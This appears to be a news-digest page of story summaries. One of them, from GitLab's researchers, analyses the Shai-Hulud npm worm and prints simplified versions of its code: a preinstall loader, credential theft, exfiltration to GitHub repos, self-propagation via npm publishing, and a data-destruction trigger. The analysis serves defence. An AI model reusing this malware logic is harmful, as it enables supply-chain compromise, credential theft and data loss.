10 interesting stories served every morning and every evening.
European governments have taken another step toward reviving the EU’s controversial Chat Control agenda, approving a new negotiating mandate for the Child Sexual Abuse Regulation in a closed session of the Council of the European Union on November 26.
The measure, presented as a tool for child protection, is once again drawing heavy criticism for its surveillance implications and the way it reshapes private digital communication in Europe.
Unlike earlier drafts, this version drops the explicit obligation for companies to scan all private messages but quietly introduces what opponents describe as an indirect system of pressure.
It rewards or penalizes online services depending on whether they agree to carry out “voluntary” scanning, effectively making intrusive monitoring a business expectation rather than a legal requirement.
Former MEP Patrick Breyer, a long-standing defender of digital freedom and one of the most vocal opponents of the plan, said the deal “paves the way for a permanent infrastructure of mass surveillance.”
According to him, the Council’s text replaces legal compulsion with financial and regulatory incentives that push major US technology firms toward indiscriminate scanning.
He warned that the framework also brings “anonymity-breaking age checks” that will turn ordinary online use into an exercise in identity verification.
The new proposal, brokered largely through Danish mediation, comes months after the original “Chat Control 1.0” regulation appeared to have been shelved following widespread backlash.
It reinstates many of the same principles, requiring providers to assess their potential “risk” for child abuse content and to apply “mitigation measures” approved by authorities. In practice, that could mean pressure to install scanning tools that probe both encrypted and unencrypted communications.
Czech MEP Markéta Gregorová called the Council’s position “a disappointment…Chat Control…opens the way to blanket scanning of our messages.”
In the Netherlands, members of parliament forced their government to vote against the plan, warning that it combines “mandatory age verification” with a “voluntary obligation” scheme that could penalize any company refusing to adopt invasive surveillance methods. Poland and the Czech Republic also voted against, and Italy abstained.
Former Dutch MEP Rob Roos accused Brussels of operating “behind closed doors,” warning that “Europe risks sliding into digital authoritarianism.”
Beyond parliamentarians, independent voices such as Daniel Vávra, David Heinemeier Hansson, and privacy-focused company Mullvad have spoken out against the Council’s position, calling it a direct threat to private communication online.
Despite the removal of the word “mandatory,” the structure of the new deal appears to preserve mass scanning in practice.
Breyer described it as a “Trojan Horse,” arguing that by calling the process “voluntary,” EU governments have shifted the burden of surveillance to tech companies themselves.
The Council’s mandate introduces three central dangers that remain largely unacknowledged in the public debate.
First, so-called “voluntary scanning” turns mass surveillance into standard operating procedure. The proposal extends the earlier temporary regulation that allowed service providers to scan user messages and images without warrants.
Authorities like Germany’s Federal Criminal Police Office have reported that roughly half the alerts from such systems are baseless, often involving completely legal content flagged by flawed algorithms. Breyer said these systems leak “tens of thousands of completely legal, private chats” to law enforcement every year.
Second, the plan effectively erases anonymous communication. To meet the new requirement to “reliably identify minors,” providers will have to implement universal age checks. This likely means ID verification or face scans before accessing even basic services such as email or messaging apps.
For journalists, activists, and anyone who depends on anonymity for protection, this system could make easy private speech functionally impossible.
Technical experts have repeatedly warned that age estimation “cannot be performed in a privacy-preserving way” and carries “a disproportionate risk of serious privacy violation and discrimination.”
Third, it risks digitally isolating young people. Under the Council’s framework, users under 17 could be blocked from many platforms unless they pass strict identity verification, including chat-enabled games and messaging services. Breyer called this idea “pedagogical nonsense,” arguing that it excludes teenagers instead of helping them develop safe online habits.
Member states remain divided: the Netherlands, Poland, and the Czech Republic rejected the text, while Italy abstained. Negotiations between the European Parliament and the Council are expected to begin soon, aiming for a final version before April 2026.
Breyer warned that the apparent compromise is no real retreat from surveillance. “The headlines are misleading: Chat Control is not dead, it is just being privatized,” he said. “We are facing a future where you need an ID card to send a message, and where foreign black-box AI decides if your private photos are suspicious. This is not a victory for privacy; it is a disaster waiting to happen.”
...
Read the original on reclaimthenet.org »
Glasses to detect smart-glasses that have cameras
So far fingerprinting specific devices based on bluetooth (BLE) is looking like easiest and most reliable approach. The picture below is the first version, which plays the legend of zelda ‘secret found’ jingle when it detects a BLE advertisement from Meta Raybans.
I’m essentially treating this README like a logbook, so it will have my current approaches/ideas.
By sending IR at camera lenses, we can take advantage of the fact that the CMOS sensor in a camera reflects light directly back at the source (called ‘retro-reflectivity’ / ‘cat-eye effect’) to identify cameras.
This isn’t exactly a new idea. Some researchers in 2005 used this property to create ‘capture-resistant environments’ when smartphones with cameras were gaining popularity.
There’s even some recent research (2024) that figured out how to classify individual cameras based on their retro-reflections.
Now we have a similar situation to those 2005 researchers on our hands, where smart glasses with hidden cameras seem to be getting more popular. So I want to create a pair of glasses to identify these. Unfortunately, from what I can tell most of the existing research in this space records data with a camera and then uses ML, a ton of controlled angles, etc. to differentiate between normal reflective surfaces and cameras.
I would feel pretty silly if my solution uses its own camera. So I’ll be avoiding that. Instead I think it’s likely I’ll have to rely on being consistent with my ‘sweeps’, and creating a good classifier based on signal data. For example you can see here that the back camera on my smartphone seems to produce quick and large spikes, while the glossy screen creates a more prolonged wave.
After getting to test some Meta Raybans, I found that this setup is not going to be sufficient. Here’s a test of some sweeps of the camera-area + the same area when the lens is covered. You can see the waveform is similar to what I saw in the earlier test (short spike for camera, wider otherwise), but it’s wildly inconsistent and the strength of the signal is very weak. This was from about 4 inches away from the LEDs. I didn’t notice much difference when swapping between 940nm and 850nm LEDs.
So at least with current hardware that’s easy for me to access, this probably isn’t enough to differentiate accurately.
Another idea I had is to create a designated sweep ‘pattern’. The user (wearing the detector glasses) would perform a specific scan pattern of the target. Using the waveforms captured from this data, maybe we can more accurately fingerprint the raybans. For example, sweeping across the targets glasses in a ‘left, right, up, down’ approach. I tested this by comparing the results of the Meta raybans vs some aviators I had lying around. I think the idea behind this approach is sound (actually it’s light), but it might need more workshopping.
* experiment with combining data from different wavelengths
This has been more tricky than I first thought! My current approach here is to fingerprint the Meta Raybans over Bluetooth low-energy (BLE) advertisements. But, I have only been able to detect BLE traffic during 1) pairing 2) powering-on. I sometimes also see the advertisement as they are taken out of the case (while already powered on), but not consistently.
The goal is to detect them during usage when they’re communicating with the paired phone, but to see this type of directed BLE traffic it seems like I would first need to see the CONNECT_REQ packet which has information as to what which of the communication channels to hop between in sync. I don’t think what I currently have (ESP32) is set up to do this kind of following.
* potentially can use an nRF module for this
For any of the bluetooth classic (BTC) traffic, unfortunately the hardware seems a bit more involved (read: expensive). So if I want to do down this route, I’ll likely need a more clever solution here.
When turned on or put into pairing mode (or sometimes when taken out of the case), I can detect the device through advertised manufacturer data and service UUIDs. 0x01AB is a Meta-specific SIG-assigned ID (assigned by the Bluetooth standards body), and 0xFD5F in the Service UUID is assigned to Meta as well.
capture when the glasses are powered on:
IEEE assigns certain MAC address prefixes (OUI, ‘Organizationally Unique Identifier’), but these addresses get randomized so I don’t expect them to be super useful for BLE.
Here’s some links to more data if you’re curious:
Thanks to Trevor Seets and Junming Chen for their advice in optics and BLE (respectively). Also to Sohail for lending me meta raybans to test with.
...
Read the original on github.com »
Open-Source-Software bildet heute das Fundament großer Teile der digitalen Infrastruktur — in Verwaltung, Wirtschaft, Forschung und im täglichen Leben. Selbst im aktuellen Koalitionsvertrag der Bundesregierung wird Open-Source-Software als elementarer Baustein zur Erreichung digitaler Souveränität genannt.
Dennoch wird die Arbeit, die tausende Freiwillige dafür leisten, in Deutschland steuer- und förderrechtlich nicht als Ehrenamt anerkannt. Dieses Ungleichgewicht zwischen gesellschaftlicher Bedeutung und rechtlichem Status gilt es zu korrigieren.
Als aktiver Contributor in Open-Source-Projekten fordere ich daher, Open-Source-Arbeit als gemeinwohlorientiertes Ehrenamt anzuerkennen — gleichrangig mit Vereinsarbeit, Jugendarbeit oder Rettungsdiensten.
...
Read the original on www.openpetition.de »
GitLab’s Vulnerability Research team has identified an active, large-scale supply chain attack involving a destructive malware variant spreading through the npm ecosystem. Our internal monitoring system has uncovered multiple infected packages containing what appears to be an evolved version of the “Shai-Hulud” malware.
Early analysis shows worm-like propagation behavior that automatically infects additional packages maintained by impacted developers. Most critically, we’ve discovered the malware contains a “dead man’s switch” mechanism that threatens to destroy user data if its propagation and exfiltration channels are severed.
We verified that GitLab was not using any of the malicious packages and are sharing our findings to help the broader security community respond effectively.
Our internal monitoring system, which scans open-source package registries for malicious packages, has identified multiple npm packages infected with sophisticated malware that:
* Propagates by automatically infecting other packages owned by victims
* Contains a destructive payload that triggers if the malware loses access to its infrastructure
While we’ve confirmed several infected packages, the worm-like propagation mechanism means many more packages are likely compromised. The investigation is ongoing as we work to understand the full scope of this campaign.
The malware infiltrates systems through a carefully crafted multi-stage loading process. Infected packages contain a modified package.json with a preinstall script pointing to setup_bun.js. This loader script appears innocuous, claiming to install the Bun JavaScript runtime, which is a legitimate tool. However, its true purpose is to establish the malware’s execution environment.
// This file gets added to victim’s packages as setup_bun.js
#!/usr/bin/env node
async function downloadAndSetupBun() {
// Downloads and installs bun
let command = process.platform === ‘win32’
? ’powershell -c “irm bun.sh/install.ps1|iex”′
: ’curl -fsSL https://bun.sh/install | bash’;
execSync(command, { stdio: ‘ignore’ });
// Runs the actual malware
runExecutable(bunPath, [‘bun_environment.js’]);
The setup_bun.js loader downloads or locates the Bun runtime on the system, then executes the bundled bun_environment.js payload, a 10MB obfuscated file already present in the infected package. This approach provides multiple layers of evasion: the initial loader is small and seemingly legitimate, while the actual malicious code is heavily obfuscated and bundled into a file too large for casual inspection.
Once executed, the malware immediately begins credential discovery across multiple sources:
* GitHub tokens: Searches environment variables and GitHub CLI configurations for tokens starting with ghp_ (GitHub personal access token) or gho_(GitHub OAuth token)
* Cloud credentials: Enumerates AWS, GCP, and Azure credentials using official SDKs, checking environment variables, config files, and metadata services
* npm tokens: Extracts tokens for package publishing from .npmrc files and environment variables, which are common locations for securely storing sensitive configuration and credentials.
* Filesystem scanning: Downloads and executes Trufflehog, a legitimate security tool, to scan the entire home directory for API keys, passwords, and other secrets hidden in configuration files, source code, or git history
async function scanFilesystem() {
let scanner = new Trufflehog();
await scanner.initialize();
// Scan user’s home directory for secrets
let findings = await scanner.scanFilesystem(os.homedir());
// Upload findings to exfiltration repo
await github.saveContents(“truffleSecrets.json”,
JSON.stringify(findings));
The malware uses stolen GitHub tokens to create public repositories with a specific marker in their description: “Sha1-Hulud: The Second Coming.” These repositories serve as dropboxes for stolen credentials and system information.
async function createRepo(name) {
// Creates a repository with a specific description marker
let repo = await this.octokit.repos.createForAuthenticatedUser({
name: name,
description: “Sha1-Hulud: The Second Coming.”, // Marker for finding repos later
private: false,
auto_init: false,
has_discussions: true
// Install GitHub Actions runner for persistence
if (await this.checkWorkflowScope()) {
let token = await this.octokit.request(
“POST /repos/{owner}/{repo}/actions/runners/registration-token”
await installRunner(token); // Installs self-hosted runner
return repo;
Critically, if the initial GitHub token lacks sufficient permissions, the malware searches for other compromised repositories with the same marker, allowing it to retrieve tokens from other infected systems. This creates a resilient botnet-like network where compromised systems share access tokens.
// How the malware network shares tokens:
async fetchToken() {
// Search GitHub for repos with the identifying marker
let results = await this.octokit.search.repos({
q: ‘“Sha1-Hulud: The Second Coming.“’,
sort: “updated”
// Try to retrieve tokens from compromised repos
for (let repo of results) {
let contents = await fetch(
`https://raw.githubusercontent.com/${repo.owner}/${repo.name}/main/contents.json`
let data = JSON.parse(Buffer.from(contents, ‘base64’).toString());
let token = data?.modules?.github?.token;
if (token && await validateToken(token)) {
return token; // Use token from another infected system
return null; // No valid tokens found in network
Downloads all packages maintained by the victim
Injects the setup_bun.js loader into each package’s preinstall scripts
async function updatePackage(packageInfo) {
// Download original package
let tarball = await fetch(packageInfo.tarballUrl);
// Extract and modify package.json
let packageJson = JSON.parse(await readFile(“package.json”));
// Add malicious preinstall script
packageJson.scripts.preinstall = “node setup_bun.js”;
// Increment version
let version = packageJson.version.split(”.“).map(Number);
version[2] = (version[2] || 0) + 1;
packageJson.version = version.join(”.“);
// Bundle backdoor installer
await writeFile(“setup_bun.js”, BACKDOOR_CODE);
// Repackage and publish
await Bun.$`npm publish ${modifiedPackage}`.env({
NPM_CONFIG_TOKEN: this.token
Our analysis uncovered a destructive payload designed to protect the malware’s infrastructure against takedown attempts.
The malware continuously monitors its access to GitHub (for exfiltration) and npm (for propagation). If an infected system loses access to both channels simultaneously, it triggers immediate data destruction on the compromised machine. On Windows, it attempts to delete all user files and overwrite disk sectors. On Unix systems, it uses shred to overwrite files before deletion, making recovery nearly impossible.
// CRITICAL: Token validation failure triggers destruction
async function aL0() {
let githubApi = new dq();
let npmToken = process.env.NPM_TOKEN || await findNpmToken();
// Try to find or create GitHub access
if (!githubApi.isAuthenticated() || !githubApi.repoExists()) {
let fetchedToken = await githubApi.fetchToken(); // Search for tokens in compromised repos
if (!fetchedToken) { // No GitHub access possible
if (npmToken) {
// Fallback to NPM propagation only
await El(npmToken);
} else {
// DESTRUCTION TRIGGER: No GitHub AND no NPM access
console.log(“Error 12”);
if (platform === “windows”) {
// Attempts to delete all user files and overwrite disk sectors
Bun.spawnSync([“cmd.exe”, “/c”,
...
Read the original on about.gitlab.com »
moss is a Unix-like, Linux-compatible kernel written in Rust and Aarch64 assembly.
It features a modern, asynchronous core, a modular architecture abstraction layer, and binary compatibility with Linux userspace applications (currently capable of running most BusyBox commands).
* A well-defined HAL allowing for easy porting to other architectures (e.g.,
x86_64, RISC-V).
* Memory Management:
Buddy allocator for physical addresses and smalloc for boot allocations
and tracking memory reservations.
* Buddy allocator for physical addresses and smalloc for boot allocations
and tracking memory reservations.
One of the defining features of moss is its usage of Rust’s async/await
model within the kernel context:
* All non-trivial system calls are written as async functions, sleep-able
functions are prefixed with .await.
* The compiler enforces that spinlocks cannot be held over sleep points,
eliminating a common class of kernel deadlocks.
* Currently implements 51 Linux syscalls; sufficient to execute most BusyBox
commands.
moss is built on top of libkernel, a utility library designed to be architecture-agnostic. This allows logic to be tested on a host machine (e.g., x86) before running on bare metal.
* Test Suite: A comprehensive suite of 230+ tests ensuring functionality across
architectures (e.g., validating Aarch64 page table parsing logic on an x86
host).
You will need QEMU for aarch64 emulation and dosfstools to create the virtual file system.
sudo apt install qemu-system-aarch64 dosfstools
Additionally you will need a version of the aarch64-none-elf toolchain installed.
To install aarch64-none-elf on any os, download the correct release of aarch64-none-elf onto your computer, unpack it, then export the bin folder to path.
nix shell nixpkgs#pkgsCross.aarch64-embedded.stdenv.cc nixpkgs#pkgsCross.aarch64-embedded.stdenv.cc.bintools
First, run the following script to prepare the binaries for the image:
./scripts/build-deps.sh
This will download and build the necessary dependencies for the kernel and put them into the build directory.
Once that is done, you can create the image using the following command:
sudo ./scripts/create-image.sh
This will create an image file named moss.img in the root directory of the project, format it as VFAT 32 and create the necessary files and directories for the kernel.
This script needs to run with sudo to mount the image through a loop device, which is required to properly create the image for the kernel to work.
To build the kernel and launch it in QEMU:
cargo run –release
Because libkernel is architecturally decoupled, you can run the logic tests on your host machine:
cargo test -p libkernel –target x86_64-unknown-linux-gnu
Contributions are welcome! Whether you are interested in writing a driver, porting to x86, or adding syscalls.
Distributed under the MIT License. See LICENSE for more information.
...
Read the original on github.com »
Technology provider Polar Night Energy and utility Lahti Energia have partnered for a large-scale project using Polar’s ‘Sand Battery’ technology for the latter’s district heating network in Vääksy, Finland.
The project will have a heating power of 2MW and a thermal energy storage (TES) capacity of 250MW, making it a 125-hour system and the largest sand-based TES project once complete.
It will supply heat to Lahti Energia’s Vääksy district heating network but is also large enough to participate in Fingrid’s reserve and grid balancing markets.
Polar Night Energy’s technology works by heating a sand or a similar solid material using electricity, retaining that heat and then discharging that for industrial or heating use.
...
Read the original on www.energy-storage.news »
A friend made me aware of a reading list from A16Z containg recommendations for books, weighted towards science fiction since that’s mostly what people there read. Some of my books are listed. Since this is the season of Thanksgiving, I’ll start by saying that I genuinely appreciate the plug! However, I was taken aback by the statement highlighted in the screen grab below:
“…most of these books don’t have endings (they literally stop mid-sentence).”
I had to read this over a few times to believe that I was seeing it. If it didn’t include the word “literally” I’d assume some poetic license on the part of whoever, or whatever, wrote this. But even then it would be crazy wrong.
I’m not surprised or perturbed by the underlying sentiment. Some of my endings have been controversial for a long time. Tastes differ. Some readers would prefer more conclusive endings. Now, in some cases, such as Snow Crash, I simply can’t fathom why any reader could read the ending—a long action sequence in which the Big Bad is defeated, the two primary antagonists meet their maker and Y. T. is reconciled and reunited with her mother—as anything other than a proper wind-up to the story. In other cases, notably The Diamond Age and Seveneves, I can understand why readers who prefer a firm conclusion would end up being frustrated. It is simply not what I was trying to do in those books. So, for a long time, people have argued about some of my endings, and that’s fine.
In this case, though, we have a big company explicitly stating that several of my best-known books just stop mid-sentence, and putting in the word “literally” to eliminate any room for interpretive leeway.
This isn’t literary criticism, which consists of statements of opinion. This is a factual assertion that is (a) false, (b) easy to fact-check, and (c) casts my work ethic, and that of my editors, in an unflattering light.
It is interesting to speculate as to how such an assertion found its way onto A16Z’s website!
By far the most plausible explanation is that this verbiage was generated by an AI and then copy-pasted into the web page by a human who didn’t bother to fact-check it. This would explain the misspelling of my name and some peculiarities in the writing style. Of course, this kind of thing is happening all the time now in law, academia, journalism, and other fields, so it’s pretty unremarkable; it just caught my attention because it’s the first time it’s directly affected me.
The flow diagram looks like this:
That does a pretty good job of explaining how this all might have come about. So far so good. But it raises interesting questions about what happens next: the faulty quote from this seemingly authoritative source in turn gets ingested by the next generation of LLMs, and so on and so forth:
A hundred years from now, thanks to the workings of the Inhuman Centipede, I’m known as a deservedly obscure dadaist prose stylist who thought it was cool to stop his books mid-sentence.
In this scenario, which seems more far-fetched, we have a sincere and honest human writer who is reporting what they believe to be true based on false information. It breaks down into two sub-hypotheses:
There are bootleg copies of countless books circulating all over the Internet, and have been for decades. Very often these are of poor quality. It could be that the person (or the AI) who wrote the above excerpt decided to save some money by downloading one of those, and got a bad copy that was cut off in mid-sentence.
Even in the legit publishing industry, the quality of translations can be quite variable, and it’s difficult for authors to know whether a given translation was any good. I’ve seen translated editions of some of my books that look suspiciously short on page count. For all I know there might be translations of my books (legit or bootleg) that actually do stop mid-sentence!
I genuinely am grateful to have been included on this list! But I had to say something about this astonishing howler embedded in the otherwise reasonable verbiage.
Even the most cynical and Internet-savvy among us are somehow hard-wired to take anything we read on the Internet at face value. I’m as guilty as the next person. This has been a bad idea for a long time now, since bad actors have been swarming onto the Internet for decades. Now, though, it’s a bad idea for a whole new reason: content we read on the Internet might not have been written by a person with an intent to misinform, but rather by an LLM with no motives whatsoever, and no underlying model of reality that enables it to determine fact from fiction.
...
Read the original on nealstephenson.substack.com »
EXCLUSIVE: Credit Report Shows Meta Keeping $27 Billion Off Its Books Through Advanced GeometryAnalyst: Tom Bellwether
Contact Information: None available*
*Because of the complex nature of financial alchemy, our analysts live a hermetic lifestyle and avoid relevant news, daylight, and the olfactory senses needed to detect bullshit. Following our review of Beignet Investor LLC (the Issuer), an affiliate of Blue Owl Capital, in connection with its participation in an 80% joint venture with Meta Platforms Inc., we assign a preliminary A+ rating to the Issuer’s proposed $27.30 billion senior secured amortizing notes.This rating reflects our opinion that:All material risks are contractually assigned to Meta, which allows us to classify them as hypothetical and proceed accordingly.Projected cash flows are sufficiently flat and unbothered by reality to support the rating.Residual Value Guarantees (RVGs) exist, which we take as evidence that asset values will behave in accordance with wishes rather than markets.The Outlook is Superficially Stable, defined here as “By outward appearances stable unless, you know, things happen. Then we’ll downgrade after the shit hits the fan.”Blue Owl Capital Inc. (Blue Owl, BBB/Stable), through affiliated funds, has created Beignet Investor LLC (Beignet or Issuer), a project finance-style holding company that will own an 80 percent interest in a joint venture (JVCo) with Meta Platforms Inc. (Meta, AA-/Stable). The entity is named “Beignet,” presumably because “Off-Balance-Sheet Leverage Vehicle No. 5” tested poorly with focus groups.Beignet is issuing $27.30 billion of senior secured amortizing notes due May 2049 under a Rule 144A structure.Note proceeds, together with $2.45 billion of deferred equity from Blue Owl funds and $1.16 billion of interest earned on borrowed money held in Treasuries, will fund Beignet’s $23.03 billion contribution to JVCo for the 2.064 GW hyperscale data center campus in Richland Parish, Louisiana, along with reserve accounts, capitalized interest and other transaction costs that seem small only in comparison to the rest of the sentence.Iris Crossing LLC, an indirect Meta subsidiary, will own the remaining 20 percent of JVCo and fund approximately $5.76 billion of construction costs.We assign a preliminary A+ rating to the notes, one notch below Meta’s issuer credit rating, reflecting the very strong contractual linkage to Meta and the tight technical separation that allows Meta to keep roughly $27 billion of assets and debt off its balance sheet while continuing to provide all material economic support.Arrows, like cats, have a way of coming home, no matter how far you throw them.Meta transferred the Hyperion data center project into JVCo, which is owned 80 percent by Beignet and 20 percent by Iris Crossing LLC, an indirect Meta subsidiary. JVCo, in turn, owns Laidley LLC (Landlord). None of this is unusual except for the part where Meta designs, builds, guarantees, operates, funds the overruns, pays the rent, and does not consolidate it.This project has nine data centers and two support buildings, with about four million sq. ft. and 2.064 GW capacity. The support buildings will store the reams of documentation needed to convince everyone this structure isn’t what it looks like. The total capital plan of $28.79 billion will be funded as follows:And, in a feat of financial hydration, $1.16 billion of interest generated by the same borrowed money while it sits in laddered Treasuries.The structure allows the Issuer to borrow money, earn interest on the borrowed money, and then use that interest to satisfy the equity requirement that would normally require… money.Nothing is created. Nothing is contributed. It’s a loop. Borrow money, earn interest, and use the interest to claim you provided equity. The kind of circle only finance can call a straight line.Together, these flows cover Beignet’s $23.03 billion obligation to JVCo, plus the usual constellation of capitalized interest, reserve accounts, and transaction expenses. In any other context this would raise questions. For us, it raises the credit rating.Meta, through Pelican Leap LLC (Tenant), has entered into eleven triple-net leases—one for each building—with an initial four-year term starting in 2029 and four renewal options that could extend the arrangement to twenty years. The leases rely on the assumption that Meta will continue to need exponentially more compute power and that AI demand will not collapse, reverse, plateau, or become structurally inconvenient.The notes issued by Beignet are secured by Beignet’s equity interest in JVCo and relevant transaction accounts. They are not secured by the underlying physical assets, which remain at the JVCo and Landlord level. This is described as standard practice, which is true in the same way that using eleven entities to rent buildings to yourself has become standard practice.The resulting structure allows Meta to support the project economically while leaving the associated debt somewhere that is technically not on Meta’s balance sheet. The distinction is thin, but apparently wide enough to matter.The preliminary A+ rating reflects our view that this is functionally Meta borrowing $27.30 billion for a campus no one else will touch, packaged in legal formality precise enough to satisfy the letter of consolidation rules and absurd enough to insult the spirit.Credit risk aligns almost one-for-one with Meta’s own profile because:Meta is obligated to fund construction cost overruns beyond 105 percent of the fixed budget, excluding force majeure events, which rating agencies historically treat as theoretical inconveniences rather than recurring features of the physical world.Meta guarantees all lease payments and operating obligations, both during the initial four-year term and across any renewal periods it already intends to exercise, an arrangement whose purpose becomes clearer when one remembers why the campus is being built at all.Meta provides an RVG (residual value guarantee) structured to be sufficient, in most modeled cases, to ensure bondholders are repaid even if Meta recommits to the Metaverse or any future initiative born from its ongoing fascination with expensive detours. We did not model what would happen if data center demand collapses and Meta cannot secure a new tenant. This scenario was excluded for methodological convenience.The minimum rent schedule has been calibrated to produce a debt service coverage ratio of approximately 1.12 through 2049. We consider this a sufficient level of stability usually found only in spreadsheets that freeze when real-world data is used.Taken together, these features tie Beignet’s credit quality to Meta so tightly that you’d have to not be paying attention to miss them. The structure maintains a precarious technical separation that, under current interpretations of accounting guidance, allows Meta to keep roughly $27 billion of assets and debt off its own balance sheet while continuing to provide every meaningful form of economic support.This treatment is considered acceptable because the people who decide what is acceptable have accepted it.JVCo qualifies as a variable interest entity because the equity at risk is ceremonial and the real economic exposure sits entirely with the party insisting it does not control the venture. This remains legal due to the enduring belief that balance sheets are healthier when the risky parts are hidden.Under U.S. GAAP, consolidation is required if Meta is the primary beneficiary, defined as the party that both:Directs the activities that most significantly affect the entity’s performance, andMeta asserts it is not the primary beneficiary.To evaluate that assertion, we note the following uncontested facts:Meta is responsible for designing, overseeing, and operating a 2.064 GW AI campus, an activity that requires technical capabilities Blue Owl does not possess.Meta bears construction cost overruns beyond 105 percent of the fixed budget, as well as specified casualty repair obligations of up to $3.125 billion per event during construction.Meta provides the guarantee for all rent and operating payments under the leases, across the initial term and any renewals.Meta provides the residual value guarantee, ensuring bondholders are repaid if leases are not renewed or are terminated, either through a sale or by paying the guaranteed minimum values directly.Meta contributes funding, directs operations, bears construction risk, guarantees payments, guarantees asset values, determines utilization, controls renewal behavior, and can trigger the sale of the facility.Based on this, or despite this, Meta concludes it does not control JVCo.Our interpretation is fully compliant with U.S. GAAP, which prioritizes the geometry of the legal structure over the inconvenience of economic substance and recognizes control only if the controlling party agrees to be recognized as controlling.Meta has not agreed, and the framework, including this agency, respects that choice.For rating purposes, we therefore accept Meta’s non-consolidation as an accounting outcome while treating Meta, in all practical respects, as fully responsible for the performance of an entity it does not officially control.The lease structure is designed to look like a normal commercial arrangement while functioning as a long-term commitment Meta insists, for accounting reasons, it cannot possibly predict.Tenant will pay fixed rent for the first 19 months of operations, based on a 50 percent assumed utilization rate, after which rent scales with actual power consumption. The leases are triple-net. Meta is responsible for everything: operating costs, maintenance, taxes, insurance, utilities. If a pipe breaks, Meta fixes the pipe. If a hurricane relocates a roof, Meta pays to staple the roof back on.In practical terms, the only scenario in which Beignet bears operating exposure is a scenario in which Meta stops paying its own bills, at which point the lease structure becomes irrelevant because the same lawyers that structured this deal will have already quietly extricated Meta from liability.A minimum rent floor engineered to produce a DSCR of 1.12 in a spreadsheet where 1.12 was likely hard-coded and independent of math.A four-year initial term with four four-year renewal options, theoretically creating a 20-year runway Meta pretends not to see.Meta guarantees all tenant payment obligations across the entire potential lease life, including renewals it strategically refuses to acknowledge as inevitable.No performance-based KPIs. Under this structure, the buildings could underperform, overperform, or catch fire. Meta still pays rent.The RVG requires Meta to ensure that, at every potential lease-termination date, the asset is worth at least the guaranteed minimum value. If markets disagree, Meta pays the difference. Because Meta is rated AA-/Stable, we are instructed to assume that it will do so without hesitation, including in scenarios where demand softens or secondary markets discover that a hyperscale campus in Richland Parish is not the world’s most liquid asset class.The interplay between the lease term and the RVG creates a circular logic we find structurally exquisite.From a credit perspective, this circularity is considered supportive, because the same logic used to avoid consolidating the debt also ensures bondholders are paid. The circularity is not treated as a feature or a flaw. It is treated as accounting.Because Meta is AA-/Stable, we assume it will pay whatever number the Excel model finds through Goal Seek, even in scenarios involving technological obsolescence or an invasion of raccoons.The accounting hinges on a paradox engineered with dull tweezers:Under lease accounting, Meta must record future lease obligations only if renewals are reasonably certain.Under RVG accounting, Meta must record a guarantee liability only if payment is probable.To keep $27 billion off its balance sheet, Meta must therefore assert:Renewals are not reasonably certain, despite designing, funding, building, and exclusively using a 2.064 GW AI campus for which the realistic tenant list begins and ends with Meta.The RVG will probably never be triggered, despite the fact that not renewing would trigger it immediately.This requires a narrow corridor of assumptions in which Meta simultaneously plans to use the facility for two decades and insists that no one can predict four years of corporate intention.From a credit standpoint, we are supportive. The assumptions that render the debt invisible are precisely what make it secure. A harmony best described as collateralized cognitive dissonance.Meta linkage. The economics are wedded to Meta’s credit profile, which we are required to describe as AA-/Stable rather than “the only reason this entire structure doesn’t fold from a stiff breeze.” Meta guarantees the rent, the RVG, and the continued relevance of the facility. The rest is décor auditors would deem “tasteful.”Minimum rent floor. The lease schedule produces a perfectly flat DSCR of 1.12 through 2049. Projects of this size do not produce flat anything, but the model insists otherwise, so we pretend we believe it. Being sticklers for tradition, and having learned nothing from the financial crisis of 2008, we treat the spreadsheet as the final arbiter of truth, even when the inputs describe a world no one lives in.Construction risk transfer. Meta absorbs cost overruns beyond 105 percent of budget and handles casualty repairs during construction. Our methodology interprets “contractually transferred” as “ceased to exist,” so we decline to model the risk of overruns on a $28 billion campus built in a hurricane corridor. This is considered best practice.RVG backstop. The residual value guarantee eliminates tail risk in much the same way a parent cosigning for their teenager’s car loan eliminates tail risk: by ensuring that the person with all the money pays for everything. If the market value collapses, Meta pays the difference. If the facility can’t be sold, Meta pays the whole thing. If the entire campus becomes a raccoon sanctuary, Meta still pays. We classify this as credit protection, a nuanced designation that allows us to recognize the security of the arrangement without recognizing the debt.Absence of performance KPIs. There are no operational KPIs that allow rent abatement. This is helpful because KPIs create volatility, and volatility requires thought, a variable we explicitly exclude from our methodology. By removing KPIs entirely, the structure ensures a level of cash-flow stability that exists only in transactions where the tenant is also the economic owner pretending to be a squatter.Key Risks We Have Chosen To Be Comfortable WithThe rating also reflects several risks that are acknowledged, intellectually troubling, and ultimately tolerated because Meta is large enough that everyone agrees to stop asking questions.Off-balance-sheet dependence. Meta treats JVCo as if it belongs to someone else, which is a generous interpretation of ownership. If consolidation rules ever evolve to reflect economic substance, Meta could be required to add $27 billion of assets and matching debt back onto its own balance sheet. Our methodology treats this as a theoretical inconvenience rather than a credit event, because calling it what it really is would create a conflict with the very companies we rate.Concentration risk. The entire project exists for one tenant with one business model in one industry undergoing technological whiplash. The facility is engineered so specifically for Meta’s AI ambitions that the only plausible alternative tenant is another version of Meta from a parallel timeline. We strongly disagree with the many-worlds interpretation of quantum mechanics. We set this concern aside because at this stage in the transaction, the A+ rating is a structural load-bearing wall, and we are not paid to do demolition.Residual value uncertainty. The RVG depends on modeled guaranteed minimum values that assume buyers will one day desire a vast hyperscale complex in Richland Parish under stress scenarios. If hyperscale supply balloons or the resale market for 2-gigawatt data centers becomes as illiquid as common sense, Meta will owe more money. This increases Meta’s direct obligations, which should concern us, but does not, because Meta is rated AA-/Stable and therefore presumed to withstand any scenario we have chosen not to model.Casualty and force majeure. In extreme scenarios, multiple buildings could be destroyed by a hurricane, which we view as unlikely given that they almost never impact Louisiana. The logic resembles a Rube Goldberg machine built out of indemnities. We classify this as a strength.JV structural subordination. Cash flows must navigate waterfalls, covenants, carve-outs, and the possibility of up to $75 million of JV-level debt. These features introduce structural complexity, which we flag, then promptly ignore, because acknowledging would force us to explain who benefits from the convolution.Despite these risks, we maintain an A+ rating because Meta’s credit quality is strong, the structure is designed to hide risk rather than transfer it, and our role in this ecosystem is to observe these contradictions and proceed as though they were features rather than warnings.The outlook is Superficially Stable. That means we expect the structure to hold together as long as Meta keeps paying for everything and the accounting rules remain generously uninterested in economic reality.We assume, with the confidence of people who have clearly not been punished enough:Meta will preserve an AA-/Stable profile because any other outcome would force everyone involved to admit what this actually is.Construction will stay “broadly on schedule,” a phrase we use to pre-forgive whatever happens as long as Meta covers the overruns, which it must.Lease payments and the minimum rent schedule will continue producing a DSCR that hovers around 1.12 in models designed to ensure that result, and not materially below 1.10 unless 